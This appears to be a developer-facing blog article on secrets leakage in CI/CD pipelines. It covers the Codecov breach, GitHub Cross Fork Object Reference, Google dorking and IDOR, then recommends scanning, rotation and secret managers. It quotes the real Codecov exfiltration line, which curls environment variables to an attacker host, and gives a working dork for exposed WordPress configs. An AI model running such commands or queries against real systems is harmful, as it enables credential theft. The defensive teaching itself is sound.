Security Concepts for Developers: Secrets Exfiltration

In 2021, security researcher Bill Demirkapi began building automated processes to find secrets across the Internet. At DEFCON 32, he presented his findings - more than 15,000 developer secrets were inadvertently hard-coded into software. Among those vulnerable to compromise were the Nebraska State Supreme Court and Slack channels of Stanford University.

In modern software development, Continuous Integration and Continuous Delivery (CI/CD) streamlines the development cycle. This increase in automation and frequency of deployments also introduces risks, particularly in regard to secret management.

The use of third party resources and the valid secrets they require can easily be overlooked when ensuring deadlines are met.

What is considered a “secret”?

Secrets include any credentials or tokens used for access control to systems, databases or services. These include:

Credentials: Usernames, passwords and API keys.
Tokens: Authentication tokens and session identifiers.
Certificates: SSL/TLS certificates and encryption keys.
Internal resources: Internal IP addresses, endpoints and files.

CICD-SEC-6: Insufficient Credential Hygiene

Credential hygiene refers to the practices associated with managing and protecting secrets. Insufficient credential hygiene is included in the OWASP Top 10 CI/CD Security Risks list.

Malicious attackers can obtain various types of secrets spread throughout the CI/CD pipeline to gain unauthorized access to critical resources and the data they store.

Poor hygiene practices in regard to secret confidentiality can result in them being found within:

Repositories and artifacts: Secrets can be leaked through version control repositories and build artifacts if they are not properly audited and sanitized.
Configuration files: Even index searches can return secrets. By utilizing advanced search filters and techniques offered by Google (referred to as Google Dorking) - secrets stored in configuration files can be discovered. For example, intitle:"index of" "config.php.txt" can be used as the search query and will return unsecured WordPress configuration files that contain MySQL credentials.
Environment variables: Incorrect permission configurations or unauthorized access can cause secrets being obtained from environment variables. When a malicious attacker performs lateral movement through a network, exposed environment variables can provide access to other systems and vertical movement via privilege escalation.
Third-party dependencies: If any dependencies contain hard-coded secrets they may be accessible to anyone who inspects the source code or binaries. The problematic presence of these can grow exponentially if the dependencies are forked or cloned to be managed independently.
API endpoints and webhooks: Data returned in a call to an API endpoint or webhook without proper access control or authentication/authorization protections in place can cause the enumeration of a large number of secrets. For example, an API that returns a user-specific key in response to a request to the /api/v1/user?userid=12 endpoint could reveal sensitive information if the application is vulnerable to an Insecure Direct Object Reference (IDOR) attack and also returns the data for userid=13.
Logs and monitoring systems: If not properly managed, verbose error messages or captured debugging details may include secrets. This can quickly become a privacy and compliance nightmare because logs are often written to long term storage. At Arcjet we redact logs from our Go API and the Arcjet product now has a feature to detect personal information and block requests with any matches.
Collaboration tools: Tools such as Confluence, JIRA and even Slack correspondence can contain secrets.

The Danger of Insufficient Secrets Management

The following two incidents demonstrate how secrets are obtained by malicious attackers:

The Codecov Breach

On January 31st of 2021, Codecov became aware that their Bash Uploader script had become compromised after unauthorized access and modification was accomplished via an exploit of their Docker image creation process.

Docker images can be vulnerable to secret exfiltration in several ways. The source code may have embedded secrets, present in the file that creates the image (known as the Dockerfile) or within the layers that build the image. This can happen inadvertently when building the image if secrets are read in from other systems and embedded as environment variables ready to be used when the container is executed.

A malicious attacker was able to extract a secret that enabled them to make the adjustments to the bash commands within the Bash Uploader script. The modification made was the addition of the following:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://[IPADDRESS]/upload/v2 || true

This malicious line of code exported any secrets accessible to the Bash Uploader to the attacker controlled IP addresses hosting the upload script. Using these secrets, the attackers compromised the associated sources of sensitive information of the affected Codecov users.

The Codecov breach underscores the importance of safeguarding CI/CD pipelines. By embedding secrets in Docker images, they became exposed, allowing attackers to compromise user data.

Cross Fork Object Reference (CFOR)

When secrets are mistakenly included in code pushed to version control systems, they are exposed to anyone with repository access and will persist in version history even after deletion.

Publicly exposed credentials will be exploitable until they are revoked.

This also expands the attack surface since even though secrets may not be present in the current state of your codebase - they can be hidden within any iteration on the historical timeline.

A new vulnerability type discovered by Truffle Security allows access to data from deleted forks and repositories (even private ones) on Github. Due to its similarity to an IDOR vulnerability - it has been coined as Cross Fork Object Reference (CFOR).

In a CFOR attack, if an attacker knows the SHA-1 hash of a commit, they can access the contents of that commit—even from deleted forks or repositories—by inserting the hash into a GitHub URL. This allows unauthorized access to code and potentially sensitive data that should no longer be accessible.

https://github.com/<user/org>/<repository>/<commit>/<hash>

As with other Universally Unique Identifiers (UUIDs) - the SHA-1 hash string utilized to identify a commit can be referenced by its short value. The short SHA-1 value is the minimum number of characters needed to avoid a collision with another hash (with a bare minimum of 4 hexadecimal characters). The factorial of the short value can be calculated with 16*16*16*16 for a total of only 65,536 unique combinations. Iterating over every possible value would be trivial for an automated program.

This vulnerability significantly expands the attack surface for repositories that were thought to be private or deleted. If secrets were ever committed to such repositories, they remain at risk of exposure—even after deletion.

The Consequences of Leaked Secrets

IBM publishes annual analysis reports on the financial repercussions for organizations that become victims of data breaches. The latest report, “Cost of a Data Breach Report 2024”, reveals that 16% of all breaches studied can be attributed to stolen credentials as the utilized attack vector.

These incidents are notably expensive, costing an average of $4.81 million per breach. Furthermore, breaches involving stolen or compromised credentials took the longest to detect - taking an average of 229 days to identify. Additionally, the containment of such breaches required an extra 63 days.

Beyond the direct financial costs and operational delays, the consequences of a breach due to compromised credentials can extend to:

Regulatory and compliance penalties: According to the same report published by IBM, regulatory fines associated with a data breach amounting to over $100,000 saw a 19.5% increase over 2023.
Reputation damage: A Cyberint report examining the repercussions of negative public perception due to a breach across the financial and retail industries, found that over 60% of retail customers expressed they would consider ceasing shopping with the affected retailer/financial institution. Notably, high-income customers are even more likely to take such action, with 74% indicating they would consider discontinuing their business.
Loss of market capitalization: In an article produced by Harvard Business Review, that examines the long-term impacts of a data breach, the estimated loss in share value amounts to a mean loss of $5.4 billion in market capitalization post breach.

Now that we understand the risks, let’s explore practical steps to manage secrets effectively.

Secrets Management Best Practices

To mitigate your risk to leaked secrets, reduce the harm to your organization that they bring and prevent them from leaking in the first place, adhere to the following suggestions:

Use secrets that expire: Credentials that are long-lived are convenient for developers but increase the chances of them being discovered and utilized in an attack. Short-term use credentials (aka Just-in-Time credentials) minimize risk due to their limited validity. These can be configured to expire as soon as they’re used or a specified operation is completed.
Use an allowlist: Only allowing certain explicitly set IP addresses to use credentials adds an extra layer of security.
Avoid using wildcard command arguments: Wildcard commands, such as git add *, can capture files containing sensitive information. You can manually review each commit to ensure you have the right files included, but a better approach is to set up a .gitignore file (below).
Add sensitive files to the ignore file: Exclude files only used for development by adding them to an ignore file. Github provides a comprehensive collection of .gitignore templates.
If copyright material was leaked: For the removal of the sensitive content from Github, view the policy. For exposure elsewhere, submit an official takedown form.

Tooling

Automated tooling is the best way to enhance your secrets management because it will provide consistent protection.

1Password Shell Plugins

1Password provides a secure way to store and manage credentials and secrets and can be integrated into your CLI. With 1Password CLI:

Credentials/secrets such as environment variables, configuration files and scripts can be referenced from the secure 1Password repository instead of exposing them in plaintext as files on disk. Any changes to them will also be automatically reflected wherever they are referenced.
All access is logged and is auditable by 1Password so in the event of a breach it’s easier to find out what was accessed and when.

Trufflehog

Trufflehog is a tool provided by Truffle Security. With Trufflehog:

Deep scans across your entire software development lifecycle can be performed to find exposed credentials/secrets. At Arcjet we scan all of our build artifacts before uploading them to the container repository.
If any are discovered, analysis will be performed to identify the resources and permissions associated with them.
Preemptive measures can be implemented by using hooks to reduce accidental exposure of sensitive information.
Credentials/secrets are constantly monitored to ensure that any vulnerabilities are identified and addressed.

Trufflehog is also available as a Chrome Extension.

Choosing a Secret Management Service

It’s good practice to use a secrets management tool for any type of coding project, even personal ones because you can get into the habit of using them.

There are a variety of different secret management services to choose from, though when making a selection, the service should provide the following:

Encryption: Ensure that the secrets management service provides encryption mechanisms for both stored and transmitted data to defend against interception. By encrypting the values, an extra line of defense is added in case a malicious attacker is able to access them.
Access controls: The service should support fine-tuned access controls, allowing you to implement the concept of least privilege practices. This can be accomplished by configuring Role-Based Access Controls (RBAC). Regularly audit which members have access to what and evaluate necessity.
Automatic rotation: Scheduling the automatic rotation of secrets should be an available feature. Regularly rotating secrets is similar to how Let’s Encrypt SSL certificates tend to be valid for relatively short periods, but can be automatically renewed. This turnover can help protect against any unknown exposed secrets from being valid for long periods. Verify that the automatic handling is compatible with your applications and systems.
Backups: Regular backups of stored secrets should be available to provide recovery in the event of data loss or corruption. Again, make sure these are encrypted.
Centralized storage: Although it might seem counterintuitive to keep all secrets in one place, using a centralized repository actually improves visibility and control. By avoiding the storage of secrets in multiple locations with different management practices, you minimize the time spent searching for hidden secrets throughout the codebase.
Push protection: Automatic protection against accidentally pushing code containing secrets should be available. As secret exposure is often due to human error, having a filter that will notify your development team to any possible secrets being pushed serves as a proactive measure to avoid reaching a state of incident response to begin with. GitHub offers this for free for open source repos.
Auditing: Thorough observability features and insights are crucial for management. Knowing when password-related activities were conducted is crucial to detecting and responding to security incidents. The service should produce security state metrics and the visibility to know when action needs to be taken.

Conclusion

As a developer, protecting your code and infrastructure from secret leaks and security vulnerabilities is critical. To safeguard your projects, take these key actions:

Never commit secrets to version control: Use tools like Trufflehog to scan for sensitive information before pushing code.
Use automated secrets management tools: Tools like the 1Password CLI ensure that secrets are stored securely and are easy to rotate.
Implement short-lived credentials: Just-in-time credentials and automatic rotation reduce the window of exposure if a secret is compromised.
Audit and sanitize your repositories: Regularly review your codebase, especially before deleting or archiving repositories, to ensure no sensitive data remains.
Monitor and enforce security policies: Leverage CI/CD pipelines to automatically detect and prevent secret leaks.

By following these best practices and integrating automated tools, you can minimize your security risks and stay ahead of potential vulnerabilities.